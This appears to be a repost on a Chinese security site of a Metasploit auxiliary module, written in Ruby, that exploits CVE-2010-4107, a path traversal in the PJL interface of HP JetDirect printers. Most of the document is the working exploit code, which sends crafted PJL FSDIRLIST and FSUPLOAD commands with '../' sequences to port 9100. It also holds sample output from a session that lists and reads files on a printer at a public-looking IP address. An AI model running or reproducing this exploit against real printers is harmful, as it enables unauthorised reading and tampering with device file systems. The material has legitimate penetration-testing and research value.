首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP JetDirect PJL Interface Universal Path Traversal
来源:http://yehg.net 作者:MyoSoe 发布时间:2011-08-11  

# Exploit Title: HP JetDirect PJL Interface Universal Path Traversal
# Date: Aug 7, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://www.hp.com
# Version: All
# Tested on: HP LaserJet Pxxxx Series

##
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


##
# Sample Output:
#
#
# msf auxiliary(hp_printer_pjl_traversal) > show options
#
# Module options (auxiliary/admin/hp_printer_pjl_traversal):
#
#    Name         Current Setting  Required  Description
#    ----         ---------------  --------  -----------
#    INTERACTIVE  false            no        Enter interactive mode [msfconsole Only]
#    RHOST        202.138.16.21    yes       The target address
#    RPATH        /                yes       The remote filesystem path to browse or read
#    RPORT        9100             yes       The target port
#
#
# msf auxiliary(hp_printer_pjl_traversal) > run
#
# [*] cd / ...
# [+] Server returned the following response:
#
# . TYPE=DIR
# .. TYPE=DIR
# bin TYPE=DIR
# usr TYPE=DIR
# etc TYPE=DIR
# hpmnt TYPE=DIR
# hp TYPE=DIR
# lib TYPE=DIR
# dev TYPE=DIR
# init TYPE=FILE SIZE=9016
# .profile TYPE=FILE SIZE=834
# tmp TYPE=DIR
#
#
# msf auxiliary(hp_printer_pjl_traversal) > set INTERACTIVE true
# INTERACTIVE => true
# msf auxiliary(hp_printer_pjl_traversal) > set RPATH /hp
# RPATH => /hp
# msf auxiliary(hp_printer_pjl_traversal) > run
#
# [*] Entering interactive mode ...
# [*] cd /hp ...
# [+] Server returned the following response:
#
# . TYPE=DIR
# .. TYPE=DIR
# app TYPE=DIR
# lib TYPE=DIR
# bin TYPE=DIR
# webServer TYPE=DIR
# images TYPE=DIR
# DemoPage TYPE=DIR
# loc TYPE=DIR
# AsianFonts TYPE=DIR
# data TYPE=DIR
# etc TYPE=DIR
# lrt TYPE=DIR
#
# [*] Current RPATH: /hp
# [*] -> 'quit' to exit
# [*] ->'/' to return to file system root
# [*] ->'..' to move up to one directory
# [*] ->'!r FILE' to read FILE on current directory
#
# [*] Enter RPATH:
# $ > webServer/config
# [*] cd /hp/webServer/config ...
# [+] Server returned the following response:
#
# . TYPE=DIR
# .. TYPE=DIR
# soe.xml TYPE=FILE SIZE=23615
# version.6 TYPE=FILE SIZE=45
#
#
# [*] Current RPATH: /hp/webServer/config
# [*] -> 'quit' to exit
# [*] ->'/' to return to file system root
# [*] ->'..' to move up to one directory
# [*] ->'!r FILE' to read FILE on current directory
#
# [*] Enter RPATH:
# $ > !r version.6
# [*] cat /hp/webServer/config/version.6 ...
# [+] Server returned the following response:
#
# WebServer directory version.  Do not delete!
#
#
# [*] Current RPATH: /hp/webServer/config
# [*] -> 'quit' to exit
# [*] ->'/' to return to file system root
# [*] ->'..' to move up to one directory
# [*] ->'!r FILE' to read FILE on current directory
#
# [*] Enter RPATH:
# $ > quit
# [*] Exited ... Have fun with your Printer!
# [*] Auxiliary module execution completed

 

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

 include Msf::Exploit::Remote::Tcp

 def initialize(info={})
  super(update_info(info,
   'Name'        => 'HP JetDirect PJL Interface Universal Path Traversal',
   'Version'     => '$Revision: 1 $',
   'Description' => %q{
    This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100.
    With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.
   },
   'Author'      => [
     'Moritz Jodeit <http://www.nruns.com/>', # Bug Discoverer
     'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module     
     ],
   'License'     => MSF_LICENSE,
   'References'     =>
   [
    [ 'CVE', '2010-4107' ],
    [ 'URL', 'http://www.nruns.com/_downloads/SA-2010%20003-Hewlett-Packard.pdf' ],    
    [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02004333' ],    
    [ 'URL', 'http://www.irongeek.com/i.php?page=security/networkprinterhacking' ],
    [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-laserjet-printer.rb' ],
    [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-OfficeJet-Printer.rb' ],
    [ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ]
   ],
   'DisclosureDate' => '2010-11-15'))
  
  register_options(
  [

   OptString.new('RPATH',
     [
      true,
      "The remote filesystem path to browse or read",
      "/"
     ]
    ),
   OptBool.new('INTERACTIVE',
        [
         false,
         "Enter interactive mode [msfconsole Only]",
         false
        ]
       ),
    
   Opt::RPORT(9100)
  ],self.class)
  

 end

 def run
  mode = datastore['INTERACTIVE']

  if mode == true
   set_interactive(datastore['RPATH'])
  else
   set_onetime(datastore['RPATH'])
  end
 end
 
 def set_interactive(spath)
  action = 'DIR'
  rpath =  spath
  rfpath = ''
  tmp_path = ''
  tmp_file = ''
  cur_dir = '/'
  
  print_status("Entering interactive mode")
  stop = false
  
  set_onetime(rpath)
  
  until stop == true  
   print_status("Current RPATH: #{rpath}")
   print_status("-> 'quit' to exit")
   print_status("->'/' to return to file system root")
   print_status("->'..' to move up to one directory")
   print_status("->'!r FILE' to read FILE on current directory\r\n")
   print_status("Enter RPATH:")
   print("$ > ")

   tmp_path = gets.chomp.to_s 
   

   if tmp_path =~ /\.\./ && rpath.length > 2
    old_path = rpath
    new_path = rpath[0,rpath.rindex('/')]
    if new_path != nil
     rpath = new_path
    else
     rpath = '/'
    end
    rpath = '/' if rpath.length == 0
    print_status("Change to one up directory: #{rpath}")
   elsif tmp_path =~ /\!r\s/ 
    cur_dir = rpath
    tmp_file = tmp_path.gsub('!r ','')
    rfpath = cur_dir + '/' + tmp_file
    rfpath = rfpath.gsub('//','/') 
    action = 'FILE'
    
   elsif tmp_path == '/'
    rpath = '/'
   elsif rpath != '/'
       rpath = rpath + '/' << tmp_path
   else
    rpath = rpath  << tmp_path
   end
   if rpath =~ /quit/
    stop= true
    rpath = '/'
    print_status("Exited ... Have fun with your Printer!")
   else
    rpath = rpath.gsub('//','/') 
    if action == 'FILE'
     set_onetime(rfpath,action)
     cur_dir = rpath
    else
     set_onetime(rpath,action)
    end
    action = 'DIR' 
   end
  end
 end
 
 def set_onetime(spath,saction =  datastore['ACTION'])
  
  rpathx  = spath
  action = saction
  rpathx = '/' if rpathx =~ /\/quit/

  connect
  
  dir_cmd = "\x1b%-12345X@PJL FSDIRLIST NAME=\"0:/../../../[REPLACE]\" ENTRY=1 COUNT=99999999\x0d\x0a\x1b%-12345X\x0d\x0a"
  file_cmd = "\x1b%-12345X@PJL FSUPLOAD NAME=\"0:/../../../[REPLACE]\" OFFSET=0 SIZE=99999999\x0d\x0a\x1b%-12345X\x0d\x0a"
  
  if action =~ /DIR/
   r_cmd = dir_cmd.sub("[REPLACE]",rpathx)
   print_status("cd #{rpathx} ...")
  else
   r_cmd = file_cmd.sub("[REPLACE]",rpathx)
   print_status("cat #{rpathx} ...") 
  end
  
   
  
  recv = sock.put(r_cmd)
  res = sock.get(-1,1)
  
  if (!res)
   print_error("ERROR in receiving data!\r\n")
  else
   if res.to_s =~ /ERROR/
    print_error("Operation Not Permitted or File/DIR Not Found!\r\n")
    disconnect
    return
   end
   resx = res.to_s[res.index("\r\n")+1,res.length]
   print_good("Server returned the following response:\r\n#{resx}")
  end
  
  disconnect 
 
 end


end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Free CD to MP3 Converter 3.1 U
·HP JetDirect PJL Query Executi
·Mozilla Firefox 3.6.16 mChanne
·LiteServe 2.81 PASV Command De
·PXE exploit server
·Acoustica Mixcraft v1.00 Local
·Net112企业建站系统遍历目录和后
·Excel SLYK Format Parsing Buff
·Sun/Oracle GlassFish Server Au
·FCKeditor all versian Arbitrar
·FreeAmp 2.0.7 .fat Buffer Over
·iPhone/iPad Phone Drive 1.1.1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved